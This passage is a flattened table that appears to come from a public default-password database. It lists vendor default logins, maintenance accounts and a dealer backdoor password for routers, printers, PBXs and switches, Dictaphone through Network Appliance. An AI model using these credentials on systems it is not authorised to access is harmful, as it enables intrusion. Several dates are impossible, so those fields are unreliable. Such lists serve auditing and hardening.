2002-1-10 2005-13-7 Dictaphone ProLog PBX PBX No 2002-1-10 2005-13-7 Dictaphone ProLog NETWORK NETWORK No 2002-1-10 2005-13-7 Dictaphone ProLog NETOP (none) No 2002-1-10 2005-13-7 Digicom Michelangelo Multi admin michelangelo Admin 2006-02-01 2006-02-01 Digicom Michelangelo Multi user password User 2006-02-01 2006-02-01 Digicorp Viper Telnet n/a BRIDGE Admin No 2002-1-10 2005-13-7 Digicorp Viper Telnet n/a password Admin No 2002-1-10 2005-13-7 Digicorp Router n/a BRIDGE Admin No 2003-1-1 2005-13-7 Digicorp Router n/a password Admin No 2003-1-1 2005-13-7 Dlink DSL-500 Multi admin admin Admin No 2002-25-8 2005-13-7 Draytek Vigor all HTTP admin admin Admin No 2004-3-5 2005-13-7 Draytek Vigor 2600 HTTP admin (none) Admin 2006-03-18 2006-03-18 Draytek Vigor 2900+ HTTP admin admin Admin 2006-07-08 2006-07-08 Dynalink RTA230 Multi admin admin Admin No 2004-22-9 2005-13-7 E-Con Econ DSL Router Router admin epicrouter Admin DSL Router 2005-09-15 2005-09-15 E-Tech ADSL Ethernet Router Annex A v2 HTTP admin epicrouter Admin Password can also be password No 2003-26-5 2005-13-7 E-Tech Wireless 11Mbps Router Model:WLRT03 HTTP (none) admin Admin No 2004-3-9 2005-13-7 E-Tech Router RTBR03 HTTP (none) admin Admin 1wan/4ports switch router No 2004-6-9 2005-13-7 Edimax Broadband Router Hardware: Rev A. Boot Code: 1.0 Runtime Code 2.63 HTTP admin 1234 Admin No 2004-2-6 2005-13-7 Edimax EW-7205APL Firmware release 2.40a-00 Multi guest (none) Admin http://secunia.com/advisories/11849/ No 2004-31-6 2005-13-7 Edimax ES-5224RXM Multi admin 123 Admin 2006-01-23 2006-01-23 Efficient Speedstream DSL Telnet n/a admin Admin No 2002-1-10 2005-13-7 Efficient 5871 DSL Router v 5.3.3-0 Multi login admin Admin This is for access to HTTP admin console. No 2002-21-10 2005-13-7 Efficient 5851 Telnet login password Admin might be all 5800 series No 2004-18-7 2005-13-7 Efficient Speedstream DSL n/a admin Admin No 2003-1-1 2005-13-7 Efficient Networks Speedstream 5711 Teledanmark version (only .dk) Console n/a 4getme2 Admin for all your TDC router needs No 2002-1-10 2005-13-7 Efficient Networks EN 5861 Telnet login admin Admin No 2002-1-10 2005-13-7 Efficient Networks 5851 SDSL Router N/A Console (none) hs7mwxkk Admin On some Covad Routers No 2003-5-1 2005-13-7 Elsa LANCom Office ISDN Router 800/1000/1100 Telnet n/a cisco Admin No 2002-1-10 2005-13-7 Enterasys ANG-1105 unknown HTTP admin netadmin Admin default IP is 192.168.1.1 No 2003-6-4 2005-13-7 Enterasys ANG-1105 unknown Telnet (none) netadmin Admin default IP is 192.168.1.1 No 2003-6-4 2005-13-7 Enterasys Vertical Horizon ANY Multi admin (none) Admin this works in telnet or http No 2003-5-11 2005-13-7 Enterasys Vertical Horizon VH-2402S Multi tiger tiger123 Admin 2006-02-01 2006-02-01 Entrust getAccess 4.x and 7.x Web Admin gui websecadm changeme Admin Access to Admin Gui via /sek-bin/login.gas.bat No 2006-03-26 2006-05-28 Ericsson Ericsson Acc netman netman No 2002-1-10 2005-13-7 Ericsson Ericsson Acc netman netman No 2003-1-1 2005-13-7 Ericsson MD110 Telnet MD110 help Admin 2006-08-25 2006-08-25 Ericsson BP250 HTTP admin default Admin 2006-08-25 2006-08-25 Ericsson ACC Tigris Platform All Multi public (none) Guest No 2002-1-10 2005-13-7 EverFocus PowerPlex EDR1600 Multi admin admin Admin No 2002-10-11 2005-13-7 EverFocus PowerPlex EDR1600 Multi supervisor supervisor Admin No 2002-10-11 2005-13-7 EverFocus PowerPlex EDR1600 Multi operator operator Admin No 2002-10-11 2005-13-7 Exabyte Magnum20 FTP anonymous Exabyte Admin 2005-11-15 2005-11-15 Extreme Networks All Switches Multi admin (none) Admin Submitted by Eastman Rivai No 2002-1-10 2005-13-7 F5 Bigip 540 Multi root default Admin No 2004-3-11 2005-13-7 F5-Networks BIGIP Multi n/a (none) Admin No 2003-1-1 2005-13-7 Flowpoint 2200 SDSL Telnet admin admin Admin No 2002-1-10 2005-13-7 Flowpoint DSL Telnet n/a password Admin Installed by Covad No 2002-1-10 2005-13-7 Flowpoint 100 IDSN Telnet admin admin Admin No 2002-1-10 2005-13-7 Flowpoint 40 IDSL Telnet admin admin Admin No 2002-1-10 2005-13-7 Flowpoint Flowpoint DSL admin admin Admin No 2003-1-1 2005-13-7 Fortinet Fortigate Telnet admin (none) Admin No 2003-1-1 2005-13-7 Foundry Networks IronView Network Manager Version 01.6.00a(service pack) 0620031754 HTTP admin admin Admin http://www.foundrynet.com/services/documentation/nms/FEManager_Installation.html Yes 2004-13-4 2005-13-7 Freetech PC BIOS Console n/a Posterie Admin No 2002-1-10 2005-13-7 Freetech BIOS Console n/a Posterie Admin No 2003-1-1 2005-13-7 Fujitsu Siemens Routers HTTP (none) connect Admin No 2004-21-11 2005-13-7 Funk Software Steel Belted Radius 3.x Proprietary admin radius Admin No 2002-1-10 2005-13-7 GVC e800/rb4 HTTP Administrator admin Admin No 2004-8-7 2005-13-7 Gericom Phoenix Multi Administrator (none) Admin 2006-01-04 2006-01-04 HP ISEE Multi admin isee Admin 2005-07-03 2005-07-03 Hewlett Packard Power Manager 3 HTTP admin admin Admin No 2004-25-7 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR HPP187 No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR HPP189 No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR HPP196 No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR INTX3 No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR ITF3000 No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR NETBASE No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR REGO No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR RJE No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR CONV No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi OPERATOR SYS No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi OPERATOR DISC No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi OPERATOR SYSTEM No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi OPERATOR SUPPORT No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi OPERATOR COGNOS No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi PCUSER SYS No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi RSBCMON SYS No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi SPOOLMAN HPOFFICE No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi WP HPOFFICE No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi ADVMAIL HPOFFICE DATA No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi ADVMAIL HP No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD SUPPORT No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD MGR No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD SERVICE No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD MANAGER No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD HPP187 SYS No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD LOTUS No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD HPWORD PUB No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi FIELD HPONLY No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi HELLO MANAGER.SYS No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi HELLO MGR.SYS No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi HELLO FIELD.SUPPORT No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi HELLO OP.OPERATOR No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MAIL MAIL No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MAIL REMOTE No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MAIL TELESUP No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MAIL HPOFFICE No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MAIL MPE No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MANAGER TCH No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MANAGER SYS No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MANAGER SECURITY No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MANAGER ITF3000 No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MANAGER HPOFFICE No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MANAGER COGNOS No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MANAGER TELESUP No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR SYS No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR CAROLIAN No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR VESOFT No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR XLSERVER No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR SECURITY No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR TELESUP No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR HPDESK No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR CCC No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR CNAS No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR WORD No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR COGNOS No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR ROBELLE No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR HPOFFICE No 2002-1-10 2005-13-7 Hewlett-Packard HP 2000/3000 MPE/xx Multi MGR HPONLY No 2002-1-10 2005-13-7 Hewlett-Packard LaserJet Net Printers Ones with Jetdirect on them Telnet (none) (none) Admin press enter twice if no response in telnet -submit by Anymous No 2002-1-10 2005-13-7 Hewlett-Packard LaserJet Net Printers Ones with Jetdirect on them HTTP (none) (none) Admin HTTP interface -submit by Anymous No 2002-1-10 2005-13-7 Hewlett-Packard LaserJet Net Printers Ones with Jetdirect on them FTP Anonymous (none) User send files to be printed -submit by Anymous No 2002-1-10 2005-13-7 Hewlett-Packard LaserJet Net Printers Ones with Jetdirect on them 9100 (none) (none) User Type what you want and close telnet session to print it out -submit by Anymous No 2002-1-10 2005-13-7 Hewlett-Packard webmin 0.84 HTTP admin hp.com Admin you can find more passwords here: http://www.vulnerabilite.com/password_db/ No 2005-22-2 2005-13-7 Huawei MT880r Multi TMAR#HWMT8007079 (none) Admin mpacheco.inimigo.com 2006-06-28 2006-06-28 Huawei mt820 V100R006C01B021 HTTP admin admin Admin Telefonica Colombia ADSL 2006-08-27 2006-08-27 IBM Ascend OEM Routers Telnet n/a ascend Admin No 2002-1-10 2005-13-7 IBM A21m Multi n/a (none) Admin No 2002-1-10 2005-13-7 IBM 390e Multi n/a admin Admin No 2002-1-10 2005-13-7 IBM TotalStorage Enterprise Server Multi storwatch specialist Admin By Nicolas Gregoire Yes 2002-1-10 2005-13-7 IBM 8239 Token Ring HUB 2.5 Console n/a R1QTPS Utility Program submitted by FX Yes 2002-26-8 2005-13-7 IBM 8224 HUB Multi vt100 public Admin Swap MAC address chip from other 8224 No 2002-1-10 2005-13-7 IBM 3534 F08 Fibre Switch Multi admin password Admin No 2003-3-5 2005-13-7 IBM switch 8275-217 Telnet admin (none) Admin No 2002-1-10 2005-13-7 IBM Directory - Web Administration Tool 5.1 HTTP superadmin secret Admin Documented in Web Administration Guide No 2004-01-16 2005-13-7 IBM Hardware Management Console 3 ssh hscroot abc123 Admin No 2005-01-21 2005-13-7 IBM 3583 Tape Library HTTP admin secure Admin 2005-07-12 2005-07-12 IBM Infoprint 6700 http://www.phenoelit.de/dpl/dpl.html Multi root (none) Admin Also works for older 4400 printers and probably Printronics equivalents as well. 2005-10-23 2005-10-23 IBM T20 Multi n/a admin Admin 2006-02-16 2006-02-16 IBM IBM Multi n/a (none) Admin 2006-02-20 2006-02-20 IBM Remote Supervisor Adapter (RSA) HTTP USERID PASSW0RD Admin 2006-02-30 2006-02-30 IBM BladeCenter Mgmt Console HTTP USERID PASSW0RD Admin 2006-02-30 2006-02-30 IBM T42 HTTP Administrator admin Admin 2006-06-27 2006-06-27 IMAI Traffic Shaper TS-1012 HTTP n/a (none) Admin default IP 1.2.3.4 No 2004-11-7 2005-13-7 Infosmart SOHO router HTTP admin 0000 Admin 2005-08-27 2005-08-27 Integral Technologies RemoteView 4 Console Administrator letmein Admin No 2004-17-2 2005-13-7 Intel Shiva Multi root (none) Admin No 2002-1-10 2005-13-7 Intel Express 9520 Router Multi NICONEX NICONEX User No 2002-1-10 2005-13-7 Intel Express 520T Switch Multi setup setup User No 2002-1-10 2005-13-7 Intel Wireless AP 2011 2.21 Multi (none) Intel Admin by FX No 2003-24-4 2005-13-7 Intel Wireless Gateway 3.x HTTP intel intel Admin No 2003-19-4 2005-13-7 Intel Shiva Guest (none) User No 2003-1-1 2005-13-7 Intel Shiva root (none) Admin No 2003-1-1 2005-13-7 Intel/Shiva Mezza ISDN Router All Telnet admin hello Admin No 2004-9-7 2005-13-7 Intel/Shiva Access Port All Telnet admin hello Admin No 2004-9-7 2005-13-7 Interbase Interbase Database Server All Multi SYSDBA masterkey Admin No 2002-1-10 2005-13-7 Intermec Mobile LAN 5.25 Multi intermec intermec Admin No 2003-1-1 2005-13-7 Intershop Intershop 4 HTTP operator $chwarzepumpe Admin No 2002-1-11 2005-13-7 Intersystems Cache Post-RDMS Console system sys Admin Change immediately No 2004-21-8 2005-13-7 IronPort Messaging Gateway Appliance Multi admin ironport Admin 2006-01-25 2006-01-25 Irongate NetSurvibox 266 1 HTTP admin NetSurvibox Admin 2006-09-02 2006-09-02 JAHT adsl router AR41/2A HTTP admin epicrouter Admin 2006-02-03 2006-02-03 JD Edwards WorldVision/OneWorld All(?) Console JDE JDE Admin/SECOFR No 2002-1-10 2005-13-7 JDE WorldVision/OneWorld Multi PRODDTA PRODDTA Admin Owner of database tables and objects No 2003-15-8 2005-13-7 JDS Microprocessing Hydra 3000 r2.02 Console hydrasna (none) Admin www.hydrasystems.com/h3kdocs/H3R25C04.pdf No 2002-1-10 2005-13-7 Juniper ISG2000 Multi netscreen netscreen Admin Just a note - netscreen is now made by Juniper - otherwise no change 2006-06-31 2006-06-31 KTI KS-2260 Telnet superuser 123456 special CLI can be disabled by renaming the regular login name to superuser 2005-08-14 2005-08-14 KTI KS2600 Console admin 123456 Admin 2005-11-14 2005-11-14 KTI KS2260 Console admin 123 Admin 2005-11-14 2005-11-14 Kalatel Calibur DSR-2000e Multi n/a 3477 Admin 2006-02-13 2006-02-13 Kalatel Calibur DSR-2000e on-screen menu system n/a 8111 restore factory defaults 2006-02-13 2006-02-13 Konica Minolta magicolor 2300 DL Multi (none) 1234 Admin info from: ftp://ftp.minolta-qms.com/pub/cts/out_going/manuals/2300dl/nic.pdf No 2004-6-4 2005-13-7 Konica Minolta magicolor 2430DL All Multi (none) (none) Admin Taken from reference manual for product 2005-08-13 2005-08-13 Konica Minolta magicolor 5430 DL HTTP admin administrator Admin 2006-09-16 2006-09-16 Konica/ Minolta Di 2010f n/a HTTP n/a 00000000 Admin Printer configuration interface 2005-06-20 2005-06-20 Kyocera EcoLink 7.2 HTTP n/a PASSWORD Admin No 2002-1-10 2005-13-7 Kyocera Telnet Server IB-20/21 multi root root Admin No 2002-1-10 2005-13-7 Kyocera Intermate LAN FS Pro 10/100 K82_0371 HTTP admin admin Admin No 2004-13-8 2005-13-7 LANCOM IL11 Multi n/a (none) Admin No 2002-12-11 2005-13-7 LG Aria iPECS All Console (none) jannie maintenance dealer backdoor password 2006-00-11 2006-00-11 LG LAM200E / LAM200R Multi admin epicrouter Admin 2006-03-18 2006-03-18 LUCENT M770 Telnet super super Admin No 2005-12-4 2005-13-7 Lantronics Lantronics Terminal Server TCP 7000 n/a access Admin No 2002-1-10 2005-13-7 Lantronics Lantronics Terminal Server TCP 7000 n/a system Admin No 2002-1-10 2005-13-7 Lantronix Lantronix Terminal TCP 7000 n/a lantronix Admin No 2002-1-10 2005-13-7 Lantronix SCS1620 Multi sysadmin PASS Admin 9600/N/8/1 XON/XOFF Yes 2004-23-2 2005-13-7 Lantronix SCS3200 EZWebCon downloaded from ftp.lantronix.com login access Admin secondary port settings login: root password: system Yes 2004-23-2 2005-13-7 Lantronix SCS400 Multi n/a admin Admin secondary priv. password: system Yes 2004-23-2 2005-13-7 Lantronix SCS200 Multi n/a admin Admin secondary priv. password: system Yes 2004-23-2 2005-13-7 Lantronix SCS100 Multi n/a access Admin secondary priv. password: system Yes 2004-22-2 2005-13-7 Lantronix ETS4P Multi n/a (none) Admin secondary priv. password: system Yes 2004-22-2 2005-13-7 Lantronix ETS16P Multi n/a (none) Admin secondary priv. password: system Yes 2004-23-2 2005-13-7 Lantronix ETS32PR Multi n/a (none) Admin secondary priv. password: system Yes 2004-23-2 2005-13-7 Lantronix ETS422PR Multi n/a (none) Admin secondary priv. password: system Yes 2004-23-2 2005-13-7 Linksys WAP11 Multi n/a (none) Admin No 2003-16-6 2005-13-7 Linksys DSL Telnet n/a admin Admin No 2002-1-10 2005-13-7 Linksys EtherFast Cable/DSL ROuter Multi Administrator admin Admin No 2002-1-10 2005-13-7 Linksys Linksys Router DSL/Cable HTTP (none) admin Admin No 2002-1-10 2005-13-7 Linksys BEFW11S4 1 HTTP admin (none) Admin No 2002-1-10 2005-13-7 Linksys BEFSR41 2 HTTP (none) admin Admin No 2003-01-27 2005-13-7 Linksys WRT54G HTTP admin admin Admin No 2004-16-11 2005-13-7 Linksys WAG54G HTTP admin admin Admin No 2004-16-11 2005-13-7 Linksys Linksys DSL n/a admin Admin No 2003-1-1 2005-13-7 Linksys WAP54G 2.0 HTTP (none) admin Admin 2005-07-31 2005-07-31 Linksys WRT54G All Revisions HTTP (none) admin Admin 2006-02-09 2006-02-09 Linksys model WRT54GC compact wireless-G broadband router Multi (none) admin Admin 2006-02-25 2006-02-25 Linksys AG 241 - ADSL2 Gateway with 4-Port Switch Multi admin admin Admin 2006-03-18 2006-03-18 Linksys Comcast Comcast-supplied HTTP comcast 1234 diagnostics 192.168.0.1/docsisdevicestatus.asp 2006-06-14 2006-06-14 Linksys WAG54GS Multi admin admin Admin 2006-06-27 2006-06-27 Linksys/ Cisco RTP300 w/2 phone ports 1.0 HTTP admin admin Admin 2006-07-01 2006-07-01 Linksys/ Cisco RTP300 w/2 phone ports 1.0 HTTP user tivonpw update access use for flashing firmware 2006-07-01 2006-07-01 Livingston IRX Router Telnet !root (none) No 2002-1-10 2005-13-7 Livingston Livingston Portmaster 3 Telnet !root (none) No 2002-1-10 2005-13-7 Livingston Officerouter Telnet !root (none) No 2002-1-10 2005-13-7 Livingstone Portmaster 2R Telnet root (none) Admin No 2002-1-10 2005-13-7 Lockdown Networks All Lockdown Products up to 2.7 Console setup changeme(exclamation) User No 2004-12-4 2005-13-7 Logitech Logitech Mobile Headset Bluetooth (none) 0000 audio access Thierry Zoller (Thierry@sniff-em.com) 2005-07-02 2005-07-02 Lucent B-STDX9000 Multi (any 3 characters) cascade No 2002-1-10 2005-13-7 Lucent B-STDX9000 debug mode n/a cascade No 2002-1-10 2005-13-7 Lucent B-STDX9000 all SNMP n/a cascade Admin No 2002-1-10 2005-13-7 Lucent CBX 500 Multi (any 3 characters) cascade No 2002-1-10 2005-13-7 Lucent CBX 500 debug mode n/a cascade No 2002-1-10 2005-13-7 Lucent GX 550 SNMP readwrite n/a cascade No 2002-1-10 2005-13-7 Lucent MAX-TNT Multi admin Ascend No 2002-1-10 2005-13-7 Lucent PSAX 1200 and below Multi root ascend No 2002-1-10 2005-13-7 Lucent PSAX 1250 and above Multi readwrite lucenttech1 Admin No 2002-1-10 2005-13-7 Lucent PSAX 1250 and above Multi readonly lucenttech2 Admin No 2002-1-10 2005-13-7 Lucent Anymedia Console LUCENT01 UI-PSWD-01 Admin requires GSI software No 2002-1-10 2005-13-7 Lucent Anymedia Console LUCENT02 UI-PSWD-02 Admin requires GSI software No 2002-1-10 2005-13-7 Lucent PacketStar Multi Administrator (none) Admin No 2002-1-10 2005-13-7 Lucent Cellpipe 22A-BX-AR USB D Console admin AitbISP4eCiG Admin No 2004-6-8 2005-13-7 Lucent System 75 bciim bciimpw No 2003-1-1 2005-13-7 Lucent System 75 bcim bcimpw No 2003-1-1 2005-13-7 Lucent System 75 bcms bcmspw No 2003-1-1 2005-13-7 Lucent System 75 bcnas bcnaspw No 2003-1-1 2005-13-7 Lucent System 75 blue bluepw No 2003-1-1 2005-13-7 Lucent System 75 browse browsepw No 2003-1-1 2005-13-7 Lucent System 75 browse looker No 2003-1-1 2005-13-7 Lucent System 75 craft craft No 2003-1-1 2005-13-7 Lucent System 75 craft craftpw No 2003-1-1 2005-13-7 Lucent System 75 cust custpw No 2003-1-1 2005-13-7 Lucent System 75 enquiry enquirypw No 2003-1-1 2005-13-7 Lucent System 75 field support No 2003-1-1 2005-13-7 Lucent System 75 inads indspw No 2003-1-1 2005-13-7 Lucent System 75 inads inads No 2003-1-1 2005-13-7 Lucent System 75 init initpw No 2003-1-1 2005-13-7 Lucent System 75 locate locatepw No 2003-1-1 2005-13-7 Lucent System 75 maint maintpw No 2003-1-1 2005-13-7 Lucent System 75 maint rwmaint No 2003-1-1 2005-13-7 Lucent System 75 nms nmspw No 2003-1-1 2005-13-7 Lucent System 75 rcust rcustpw No 2003-1-1 2005-13-7 Lucent System 75 support supportpw No 2003-1-1 2005-13-7 Lucent System 75 tech field No 2003-1-1 2005-13-7 MERCURY 234234 234234 SNMP Administrator admin Admin No 2002-1-10 2005-13-7 MERCURY KT133A/686B SNMP Administrator admin Admin No 2002-1-10 2005-13-7 Marconi Fore ATM Switches Multi ami (none) Admin No 2002-1-10 2005-13-7 McAfee SCM 3100 4.1 Multi scmadmin scmchangeme Admin 2005-11-23 2005-11-23 McData FC Switches/Directors Multi Administrator password Admin 2005-10-07 2005-10-07 Megastar BIOS Console n/a star Admin No 2003-1-1 2005-13-7 Mentec Micro/RSX Multi MICRO RSX Admin No 2002-1-10 2005-13-7 Mentec Micro/RSX MICRO RSX Admin No 2003-1-1 2005-13-7 Meridian PBX ANY Telnet service smile System This is the default password on most Meridian systems. No 2003-1-6 2005-13-7 Micronet Access Point SP912 Telnet root default Admin No 2002-1-10 2005-13-7 Micronet Micronet SP5002 Console mac (none) Admin No 2003-6-7 2005-13-7 Micronet 3351 / 3354 Multi admin epicrouter Admin 2006-03-18 2006-03-18 Microplex Print Server Telnet root root Admin No 2002-1-10 2005-13-7 Mikrotik Router OS all Telnet admin (none) Admin also for SSH and Web access No 2004-2-9 2005-13-7 Mikrotik Router OS 2.9.17 HTTP admin (none) Admin 2006-05-09 2006-05-09 Milan mil-sm801p Multi root root Admin 2006-00-23 2006-00-23 Minolta PagrPro QMS 4100GN PagePro HTTP n/a sysadm Admin 2006-08-12 2006-08-12 Minolta QMS Magicolor 3100 3.0.0 HTTP operator (none) Admin 2006-02-29 2006-02-29 Minolta QMS Magicolor 3100 3.0.0 HTTP admin (none) Admin Gives access to Accounting 2006-06-31 2006-06-31 Mintel Mintel PBX n/a SYSTEM Admin No 2002-1-10 2005-13-7 Mintel Mintel PBX n/a SYSTEM Admin No 2003-1-1 2005-13-7 Mitel 3300 ICP all HTTP system password Admin No 2003-17-1 2005-13-7 Mitel SX2000 all Multi n/a (none) Admin No 2003-1-1 2005-13-7 Motorola Cablerouter Telnet cablecom router Admin No 2002-1-10 2005-13-7 Motorola WR850G 4.03 HTTP admin motorola Admin higher revisions likely the same No 2003-1-1 2005-13-7 Motorola Wireless Router WR850G HTTP admin motorola Admin No 2005-17-1 2005-13-7 Motorola SBG900 HTTP admin motorola Admin No 2005-10-2 2005-13-7 Motorola Motorola Cablerouter cablecom router Admin No 2003-1-1 2005-13-7 Mutare Software EVM Admin All HTTP (none) admin Admin http://www.mutare.com/data/kb/EVMAdminGuide.pdf Yes 2004-10-4 2005-13-7 NAI Intrushield IPS 1200/2600/4000 SSH + Web console admin admin123 Admin By Nicolas Gregoire No 2004-19-7 2005-13-7 NAI Entercept Management console GlobalAdmin GlobalAdmin Admin By Nicolas Gregoire : must be changed at 1st connection No 2004-19-7 2005-13-7 NEC WARPSTAR-BaseStation Telnet n/a (none) Admin No 2003-18-8 2005-13-7 NGSec NGSecureWeb HTTP admin (none) Admin No 2002-1-10 2005-13-7 NGSec NGSecureWeb HTTP admin asd Admin No 2002-1-10 2005-13-7 NOKIA 7360 Multi (none) 9999 Admin 2005-11-31 2005-11-31 NRG or RICOH DSc338 Printer 1.19 HTTP (none) password Admin no user 2006-00-26 2006-00-26 NetGear RM356 None Telnet (none) 1234 Admin shutdown the router via internet No 2002-1-10 2005-13-7 NetGear WGT624 2 HTTP admin password Admin No 2004-12-10 2005-13-7 NetGear Comcast Comcast-supplied HTTP comcast 1234 diagnostics page 192.168.0.1/docsisdevicestatus.html 2006-06-14 2006-06-14 NetGenesis NetAnalysis Web Reporting HTTP naadmin naadmin Admin No 2002-1-10 2005-13-7 Netcomm NB1300 HTTP admin password Admin No 2003-1-1 2005-13-7 Netgea FR314 HTTP admin password Admin No 2002-1-10 2005-13-7 Netgear MR-314 3.26 HTTP admin 1234 Admin No 2002-1-10 2005-13-7 Netgear RT314 HTTP admin admin Admin No 2002-1-10 2005-13-7 Netgear RP614 HTTP admin password Admin No 2003-14-1 2005-13-7 Netgear RP114 3.26 Telnet (none) 1234 Admin telnet 192.168.0.1 No 2003-1-8 2005-13-7 Netgear WG602 Firmware Version 1.04.0 HTTP super 5777364 Admin Yes 2004-10-6 2005-13-7 Netgear WG602 Firmware Version 1.7.14 HTTP superman 21241036 Admin No 2004-23-6 2005-13-7 Netgear WG602 Firmware Version 1.5.67 HTTP super 5777364 Admin No 2004-23-6 2005-13-7 Netgear MR814 HTTP admin password Admin No 2003-23-8 2005-13-7 Netgear FVS318 HTTP admin password Admin No 2003-1-1 2005-13-7 Netgear DM602 FTP Telnet and HTTP admin password Admin No 2004-22-2 2005-13-7 Netgear FR114P HTTP admin password Admin No 2004-9-11 2005-13-7 Netgear ME102 SNMP (none) private Admin Standard IP-Address is 192.168.0.5 No 2003-1-1 2005-13-7 Netgear WGR614 v4 Multi admin password Admin 192.168.0.1 OR www.routerlogin.net No 2005-20-2 2005-13-7 Netgear RP114 3.20-3.26 HTTP admin 1234 Admin default http://192.168.0.1 Yes 2002-1-10 2005-13-7 Netgear dg834g HTTP admin password Admin it should be work also with dg834gt 2005-09-07 2005-09-07 Netgear Router/Modem Multi admin password Admin 2006-00-04 2006-00-04 Netgear MR314 Multi admin 1234 Admin 2006-00-20 2006-00-20 Netgear GSM7224 HTTP admin (none) Admin 2006-01-03 2006-01-03 Netgear ADSL Modem DG632 V3.3.0a_cx HTTP admin password Admin 2006-04-23 2006-04-23 Netgear WGT634U HTTP admin password Admin 2006-05-14 2006-05-14 Netgear FWG114P Multi n/a admin password 2006-05-27 2006-05-27 Netgear GS724t V1.0.1_1104 HTTP n/a password Admin 2006-05-29 2006-05-29 Netgear WG602 1.7.x HTTP admin password Admin Default IP: DHCP or 192.168.0.227 2006-08-09 2006-08-09 Netgear CG814CCR 2 Multi cusadmin highspeed Admin Comcast small business router. Default access at 10.1.10.1 2006-08-15 2006-08-15 Netopia Netopia 9500 Telnet netopia netopia Admin No 2002-1-10 2005-13-7 Netopia R910 Multi admin (none) Admin No 2002-25-8 2005-13-7 Netopia 3351 Multi n/a (none) Admin No 2003-11-11 2005-13-7 Netopia 4542 Multi admin noway Admin No 2003-26-11 2005-13-7 Netopia Netopia 7100 (none) (none) No 2003-1-1 2005-13-7 Netopia Netopia 9500 netopia netopia No 2003-1-1 2005-13-7 Netport Express 10/100 multi setup setup Admin No 2002-1-10 2005-13-7 Netscreen Firewall multi netscreen netscreen Admin No 2002-1-10 2005-13-7 Netstar Netpilot Multi admin password Admin http://www.netpilot.com/products/netpilot/faq/default.asp No 2003-14-10 2005-13-7 Network Appliance NetCache any Multi admin NetCache Admin No 